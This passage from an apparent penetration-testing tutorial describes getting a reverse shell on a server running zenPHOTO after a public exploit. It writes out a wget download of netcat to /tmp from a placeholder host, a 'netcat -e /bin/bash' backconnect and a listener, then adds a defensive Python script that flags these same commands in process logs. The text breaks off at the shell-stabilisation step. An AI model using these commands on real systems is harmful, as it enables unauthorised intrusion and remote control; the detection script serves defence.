Spawning a TTY Shell
We have covered different types of privilege escalation. Now let's look at some examples of how to get a TTY shell on this system. A TTY provides a simple text-based environment that allows us to type commands and see their output.
How to do it...
- Let's look at the following example, where we have a web application running zenPHOTO:
- zenPHOTO already has a public exploit, which we run to get access via a limited shell:
- Since this is a limited shell, we try to escape it and get a reverse connection by first uploading netcat on the system and then using netcat to gain a backconnect:
wget x.x.x.x/netcat -O /tmp/netcat
- Now we can backconnect using the following command:
netcat <our IP> -e /bin/bash <port number>
- Looking at our Terminal window, where we had our listener set up, we will see a successful connection:
nc -lnvp <port number>
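Seen from the defender's side, the download and backconnect steps above leave a recognisable trail in process-execution logs. The following detection logic is an added example, not part of the original recipe; the event format, sample addresses, port and finding names are assumptions constructed for illustration.

```python
import shlex

# Constructed events (user, command line); format, addresses and port are assumed.
SAMPLE_EVENTS = [
    ("www-data", "wget 203.0.113.5/netcat -O /tmp/netcat"),
    ("www-data", "/tmp/netcat 203.0.113.5 -e /bin/bash 4444"),
    ("www-data", "php /var/www/html/cron.php"),
    ("bob", "nc -zv 192.0.2.10 443"),
]

WEB_USERS = {"www-data", "apache", "nginx"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
SHELLS = {"sh", "bash", "dash", "zsh"}
NETCAT_NAMES = {"nc", "netcat", "ncat"}
DOWNLOAD_FLAGS = {"wget": {"-O", "--output-document"}, "curl": {"-o", "--output"}}


def classify(cmdline):
    """Return the set of findings for one command line."""
    argv = shlex.split(cmdline)
    if not argv:
        return set()
    prog = argv[0].rsplit("/", 1)[-1]
    findings = set()
    if argv[0].startswith(WRITABLE_DIRS):
        findings.add("exec-from-writable-dir")
    # Walk adjacent (flag, value) pairs, e.g. ("-e", "/bin/bash").
    for flag, value in zip(argv[1:], argv[2:]):
        if flag in DOWNLOAD_FLAGS.get(prog, ()) and value.startswith(WRITABLE_DIRS):
            findings.add("download-to-writable-dir")
        if flag in ("-e", "-c") and value.rsplit("/", 1)[-1] in SHELLS:
            if prog in NETCAT_NAMES or "exec-from-writable-dir" in findings:
                findings.add("socket-bound-shell")
    return findings


def triage(events):
    """Return (severity, user, cmdline, findings); web server accounts rate high."""
    alerts = []
    for user, cmdline in events:
        findings = classify(cmdline)
        if findings:
            severity = "high" if user in WEB_USERS else "medium"
            alerts.append((severity, user, cmdline, sorted(findings)))
    return alerts


if __name__ == "__main__":
    print(*triage(SAMPLE_EVENTS), sep="\n")
```

The web server account running a download into a world-writable directory, followed by a netcat process given a shell to execute, is the sequence worth alerting on; either event alone from an interactive user rates lower.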
Let's get a more stable TTY shell; assuming it's a Linux system, we already have Python installed on it...